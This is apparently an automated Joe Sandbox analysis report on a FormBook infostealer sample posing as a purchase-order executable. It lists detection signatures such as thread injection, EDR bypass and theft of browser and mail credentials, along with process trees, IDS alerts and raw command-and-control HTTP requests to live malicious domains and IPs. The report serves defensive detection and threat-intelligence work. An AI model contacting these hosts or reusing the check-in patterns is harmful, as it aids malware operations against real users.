Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO No. 0146850827805 HSP0059842.exe

Overview

General Information

Sample name:PO No. 0146850827805 HSP0059842.exe
Analysis ID:1592269
MD5:6ba617537993e9d6e9cac767ec890371
SHA1:2d069b03bdf6f59b4bf8ef8ee7a3478a7e933172
SHA256:e47e99b156e62530b7e983fc5261b4bb5f0b0d3263ff395a7f794ca38a0aefd9
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO No. 0146850827805 HSP0059842.exe (PID: 2320 cmdline: "C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exe" MD5: 6BA617537993E9D6E9CAC767EC890371)
    • xVHAYGlJzfAqXG.exe (PID: 516 cmdline: "C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 3984 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • xVHAYGlJzfAqXG.exe (PID: 4140 cmdline: "C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 2360 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2514153337.0000000001480000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3982308756.0000000002970000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3981444613.0000000000340000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3985173271.0000000004A80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO No. 0146850827805 HSP0059842.exe.b80000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-16T00:43:26.410021+010020507451Malware Command and Control Activity Detected192.168.2.64994247.83.1.9080TCP
              2025-01-16T00:43:49.681197+010020507451Malware Command and Control Activity Detected192.168.2.64998884.32.84.3280TCP
              2025-01-16T00:44:03.092118+010020507451Malware Command and Control Activity Detected192.168.2.649994104.21.18.17180TCP
              2025-01-16T00:44:16.853438+010020507451Malware Command and Control Activity Detected192.168.2.649998134.122.133.8080TCP
              2025-01-16T00:44:30.170396+010020507451Malware Command and Control Activity Detected192.168.2.650003199.192.21.16980TCP
              2025-01-16T00:44:43.965195+010020507451Malware Command and Control Activity Detected192.168.2.650007154.197.162.23980TCP
              2025-01-16T00:45:06.742790+010020507451Malware Command and Control Activity Detected192.168.2.650012134.122.133.8080TCP
              2025-01-16T00:45:21.205943+010020507451Malware Command and Control Activity Detected192.168.2.65001647.83.1.9080TCP
              2025-01-16T00:45:35.715621+010020507451Malware Command and Control Activity Detected192.168.2.650021188.114.97.380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-16T00:43:26.410021+010028554651A Network Trojan was detected192.168.2.64994247.83.1.9080TCP
              2025-01-16T00:43:49.681197+010028554651A Network Trojan was detected192.168.2.64998884.32.84.3280TCP
              2025-01-16T00:44:03.092118+010028554651A Network Trojan was detected192.168.2.649994104.21.18.17180TCP
              2025-01-16T00:44:16.853438+010028554651A Network Trojan was detected192.168.2.649998134.122.133.8080TCP
              2025-01-16T00:44:30.170396+010028554651A Network Trojan was detected192.168.2.650003199.192.21.16980TCP
              2025-01-16T00:44:43.965195+010028554651A Network Trojan was detected192.168.2.650007154.197.162.23980TCP
              2025-01-16T00:45:06.742790+010028554651A Network Trojan was detected192.168.2.650012134.122.133.8080TCP
              2025-01-16T00:45:21.205943+010028554651A Network Trojan was detected192.168.2.65001647.83.1.9080TCP
              2025-01-16T00:45:35.715621+010028554651A Network Trojan was detected192.168.2.650021188.114.97.380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-16T00:43:42.005774+010028554641A Network Trojan was detected192.168.2.64998484.32.84.3280TCP
              2025-01-16T00:43:44.573825+010028554641A Network Trojan was detected192.168.2.64998584.32.84.3280TCP
              2025-01-16T00:43:47.118288+010028554641A Network Trojan was detected192.168.2.64998684.32.84.3280TCP
              2025-01-16T00:43:55.446473+010028554641A Network Trojan was detected192.168.2.649991104.21.18.17180TCP
              2025-01-16T00:43:58.001240+010028554641A Network Trojan was detected192.168.2.649992104.21.18.17180TCP
              2025-01-16T00:44:00.492568+010028554641A Network Trojan was detected192.168.2.649993104.21.18.17180TCP
              2025-01-16T00:44:09.139486+010028554641A Network Trojan was detected192.168.2.649995134.122.133.8080TCP
              2025-01-16T00:44:11.716134+010028554641A Network Trojan was detected192.168.2.649996134.122.133.8080TCP
              2025-01-16T00:44:14.292347+010028554641A Network Trojan was detected192.168.2.649997134.122.133.8080TCP
              2025-01-16T00:44:22.500540+010028554641A Network Trojan was detected192.168.2.650000199.192.21.16980TCP
              2025-01-16T00:44:25.062644+010028554641A Network Trojan was detected192.168.2.650001199.192.21.16980TCP
              2025-01-16T00:44:27.997962+010028554641A Network Trojan was detected192.168.2.650002199.192.21.16980TCP
              2025-01-16T00:44:36.363588+010028554641A Network Trojan was detected192.168.2.650004154.197.162.23980TCP
              2025-01-16T00:44:38.874131+010028554641A Network Trojan was detected192.168.2.650005154.197.162.23980TCP
              2025-01-16T00:44:41.419102+010028554641A Network Trojan was detected192.168.2.650006154.197.162.23980TCP
              2025-01-16T00:44:58.925327+010028554641A Network Trojan was detected192.168.2.650009134.122.133.8080TCP
              2025-01-16T00:45:01.501814+010028554641A Network Trojan was detected192.168.2.650010134.122.133.8080TCP
              2025-01-16T00:45:04.195896+010028554641A Network Trojan was detected192.168.2.650011134.122.133.8080TCP
              2025-01-16T00:45:13.312099+010028554641A Network Trojan was detected192.168.2.65001347.83.1.9080TCP
              2025-01-16T00:45:15.905888+010028554641A Network Trojan was detected192.168.2.65001447.83.1.9080TCP
              2025-01-16T00:45:18.435485+010028554641A Network Trojan was detected192.168.2.65001547.83.1.9080TCP
              2025-01-16T00:45:27.005522+010028554641A Network Trojan was detected192.168.2.650018188.114.97.380TCP
              2025-01-16T00:45:29.942066+010028554641A Network Trojan was detected192.168.2.650019188.114.97.380TCP
              2025-01-16T00:45:32.596148+010028554641A Network Trojan was detected192.168.2.650020188.114.97.380TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: PO No. 0146850827805 HSP0059842.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.adadev.info/ctdy/Avira URL Cloud: Label: malware
              Source: http://www.gayhxi.info/k2i2/?XLc=1bXtqxM&fVnx=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E=Avira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/?fVnx=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZL0slqAhO+jziob4VAcWGL05V4I5mluLEA+jVEoKfPxy0XA8CH1k=&XLc=1bXtqxMAvira URL Cloud: Label: malware
              Source: http://www.promocao.info/zaz4/Avira URL Cloud: Label: malware
              Source: http://www.promocao.info/zaz4/?fVnx=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&XLc=1bXtqxMAvira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: PO No. 0146850827805 HSP0059842.exeReversingLabs: Detection: 65%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP0059842.exe.b80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2514153337.0000000001480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982308756.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3981444613.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3985173271.0000000004A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982249648.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2515425897.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3982653238.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: PO No. 0146850827805 HSP0059842.exeJoe Sandbox ML: detected
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO No. 0146850827805 HSP0059842.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2513662763.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982144949.00000000014F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2513662763.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982144949.00000000014F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xVHAYGlJzfAqXG.exe, 00000005.00000000.2436656229.00000000005EE000.00000002.00000001.01000000.00000005.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000000.2597123862.00000000005EE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2416012955.00000000011BC000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2418057297.0000000001366000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.00000000016AE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000006.00000003.2517217275.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002F0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000006.00000003.2514052267.0000000002A15000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: PO No. 0146850827805 HSP0059842.exe, PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2416012955.00000000011BC000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000003.2418057297.0000000001366000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP0059842.exe, 00000000.00000002.2514194264.00000000016AE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000006.00000003.2517217275.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002F0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000006.00000003.2514052267.0000000002A15000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000006.00000002.3982768895.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 6_2_0035C870 FindFirstFileW,FindNextFileW,FindClose,6_2_0035C870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax6_2_00349EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi6_2_0034E4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h6_2_02BC04CE
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 4x nop then pop edi8_2_04AB60C7
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 4x nop then xor eax, eax8_2_04AAA9A5
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 4x nop then pop edi8_2_04AA71C6
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 4x nop then pop edi8_2_04AB6132
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeCode function: 4x nop then pop edi8_2_04AA5141

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49984 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50016 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49994 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50007 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50016 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49942 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49942 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50021 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49998 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 47.83.1.90:80
              Source: Joe Sandbox ViewIP Address: 154.197.162.239 154.197.162.239
              Source: Joe Sandbox ViewIP Address: 104.21.18.171 104.21.18.171
              Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?XLc=1bXtqxM&fVnx=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?fVnx=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /kxtt/?fVnx=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?fVnx=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?fVnx=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /cf9p/?fVnx=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFEZ78yqKoeuU5J+b47iNq8whadf8QcoBPTRq9CV/chxpb7frDW/o=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /jpjz/?fVnx=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcbnKqUdTRdEmAj6qp0S6DrV+QINeL9xy6H8KuIEkcUIhaI8bz/+o=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
